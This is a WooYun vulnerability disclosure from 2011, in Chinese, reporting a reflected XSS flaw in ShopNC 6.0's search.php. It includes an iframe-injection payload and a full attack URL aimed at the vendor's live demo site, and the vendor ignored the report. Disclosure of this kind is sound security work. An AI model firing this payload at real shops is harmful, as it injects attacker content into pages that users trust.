当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02578

漏洞标题:ShopNC单用户版存在XSS漏洞

相关厂商:网城创想

漏洞作者: 路人甲

提交时间:2011-07-27 12:27

修复时间:2011-07-27 15:33

公开时间:2011-07-27 15:33

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:7

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-07-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-07-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

自称最安全的商城系统,ShopNC 单用户程序, 通过构造特殊url,实现对ShopNC的XSS攻击.
目前最新版本 6.0 存在此问题!

详细说明:

Search.php页面 对search变量未进行严格过滤,
无论是否编码均执行用户url提交的脚本
比如,跨站脚本为

<iframe src=http://www.fengblog.org/ width=800 height=160 frameborder=0 ></iframe>


如图


目前可以在官方演示站进行测试
http://mall.shopnc.net

http://mall.shopnc.net/search.php?all_sun=all_sun&button=%e6%90%9c%e7%b4%a2%e7%bb%93%e6%9e%9c&end_price=&keywords=%27%22%28%29%26%251</textarea><iframe src=http://www.fengblog.org/ width=800 height=160 frameborder=0 ></iframe>&sel_goods_brand=&start_price=&txt_class_top_id=0


漏洞证明:

都在详细说明中.

修复方案:

由于代码是经过Zend加密的,这个问题请等待厂商发布!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝